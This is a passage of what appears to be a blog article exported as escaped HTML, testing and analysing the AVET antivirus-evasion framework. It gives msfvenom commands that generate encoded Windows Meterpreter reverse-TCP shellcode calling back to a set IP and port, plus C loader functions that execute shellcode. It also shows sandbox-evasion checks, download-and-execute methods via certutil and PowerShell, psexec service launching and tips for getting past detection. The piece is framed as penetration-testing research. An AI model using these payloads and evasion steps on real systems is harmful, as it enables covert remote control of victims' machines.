sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>File content as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019839099_4_74f80c3b51-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Run format.sh to extract shellcode from previous file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fformat.sh sc.txt &gt; scclean.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Extracted file content as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019860413_5_373eb0f5e1-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Personally, I believe the above two steps can be achieved with one command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Run make_avet to extract shellcode from previous file, set feature flags, and write to file defs.h\u003C\u002Fh3>\u003Cp>The function flags correspond to the various features supported by make_avet; detailed explanations can be obtained by executing .\u002Fmake_avet -h.\u003C\u002Fp>\u003Cp>The specific functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Read shellcode from a specified file and execute it.\u003C\u002Fli>\u003Cli>Read encrypted shellcode from a specified file, decrypt it, and then execute.\u003C\u002Fli>\u003Cli>Call iexplore.exe to access a specified URL, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Use WinAPI socket calls to access port 80 of a specified URL, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Download a file via certutil, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Download a file via PowerShell, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Use WinAPI fopen to bypass sandbox detection.\u003C\u002Fli>\u003Cli>Use WinAPI gethostbyname to bypass sandbox detection.\u003C\u002Fli>\u003Cli>Compile into a 64-bit executable.\u003C\u002Fli>\u003Cli>Hide the program window.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>4. Use gcc to compile avet.c, generating the final file.\u003C\u002Fh3>\u003Cp>avet.c is the main program, reading shellcode and function flags from the header file defs.h.\u003C\u002Fp>\u003Ch2>0x05 Technical Details Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Core code for executing shellcode\u003C\u002Fh3>\u003Cp>(1)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\tint (*funct)();\u003Cbr>\tfunct = (int (*)()) shellcode;\u003Cbr>\t(int)(*funct)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating corresponding shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x86\u002Fxor -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode_ASCIIMSF(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\tregister unsigned char* r asm(\"eax\");\u003Cbr>\\tr=shellcode;\u003Cbr>\\tasm(\"call *%eax;\");\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x86\u002Falpha_mixed -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode64(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\\tint len=strlen(shellcode);\u003Cbr>\\tDWORD l=0;\u003Cbr>\\tVirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&amp;l);\u003Cbr>\\t(* (int(*)()) shellcode)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The encryption method for shellcode can also choose shikata_ga_nai. The parameters for using shikata_ga_nai encryption for 50 rounds are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.2.103 lport=443 -e x86\u002Fshikata_ga_nai -i 50 -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Supplement\u003C\u002Fstrong>：\u003C\u002Fp>\u003Cp>The method of executing shellcode is not unique; here is another example code for executing shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\t((void(*)(void))&amp;shellcode)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The method of generating shellcode is also not unique; you can generate shellcode according to your own ideas.\u003C\u002Fp>\u003Ch3>2、Self-implemented encryption and decryption algorithms\u003C\u002Fh3>\u003Cp>The corresponding parameter for encryption is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -E\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding code for decryption is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>unsigned char* decode_shellcode(unsigned char *buffer, unsigned char *shellcode, int size)\u003Cbr>{\u003Cbr>\tint j=0;\u003Cbr>\tshellcode=malloc((size\u002F2));\u003Cbr>\tint i=0;\u003Cbr>\tdo\u003Cbr>\t{\u003Cbr>\t\tunsigned char temp[3]={0};\u003Cbr>\t\tsprintf((char*)temp,\"%c%c\",buffer[i],buffer[i+1]);\u003Cbr>\t\tshellcode[j] = strtoul(temp, NULL, 16);\u003Cbr>\t\ti+=2;\u003Cbr>\t\tj++;\u003Cbr>\t} while(i\u003Csize);\u003Cbr>\treturn shellcode;\u003Cbr>}\u003C\u002Fsize);\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Sandbox Evasion\u003C\u002Fh3>\u003Ch4>(1) Using WinAPI fopen\u003C\u002Fh4>\u003Cp>Save shellcode in file c:\\windows\\system.ini\u003C\u002Fp>\u003Cp>Read file c:\\windows\\system.ini during main program execution\u003C\u002Fp>\u003Cp>If in sandbox, unable to open file c:\\windows\\system.ini, main program automatically exits\u003C\u002Fp>\u003Cp>Key code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>FILE *fp = fopen(\"c:\\\\windows\\\\system.ini\", \"rb\");\u003Cbr>if (fp == NULL)\u003Cbr>\treturn 0;\u003Cbr>fclose(fp);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Using WinAPI gethostbyname\u003C\u002Fh4>\u003Cp>Main program calls WinAPI gethostbyname to obtain host information for specified hostname\u003C\u002Fp>\u003Cp>If in sandbox, gethostbyname will return NULL, main program automatically exits\u003C\u002Fp>\u003Cp>Key code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>struct hostent *hp = gethostbyname(KVALUE);\u003Cbr>if (hp != NULL) \t\t\u003Cbr>\texit(0);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Methods for detecting sandbox conditions are not unique; examples include system process information, configuration information, device information, etc.\u003C\u002Fp>\u003Ch3>4. Supports remote execution via psexec\u003C\u002Fh3>\u003Cp>The main program is replaced with avetsvc.c\u003C\u002Fp>\u003Cp>Compared to avet.c, avetsvc.c adds service registration functionality, enabling remote startup via psexec as a service\u003C\u002Fp>\u003Ch2>0x06 Evasion Effectiveness\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Specific evasion effectiveness details omitted\u003C\u002Fp>\u003Cp>If detected, you can try the following methods:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the shellcode\u003C\u002Fli>\u003Cli>Encrypt the shellcode\u003C\u002Fli>\u003Cli>Change the shellcode loading method\u003C\u002Fli>\u003Cli>Use a trusted program with a digital signature to launch the shellcode\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article conducts practical testing on avet, analyzing its technical details while omitting the actual antivirus evasion effectiveness.\u003C\u002Fp>\u003Cp>Overall, avet implements a complete framework, making it easy to perform secondary development on this basis, which indeed can enhance the efficiency of penetration testers.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1705,"Onedaysec",5,"published","2026-02-02T08:20:05.021Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"AVET AntiVirus Evasion Tool Testing & Analysis Guide","avet antivirus evasion, bypass antivirus, meterpreter payload, shellcode, penetration testing, blackhat arsenal",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],111,110,109,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.407Z","2026-07-23T16:01:01.330Z","draft","2026-07-23T16:03:40.252Z"]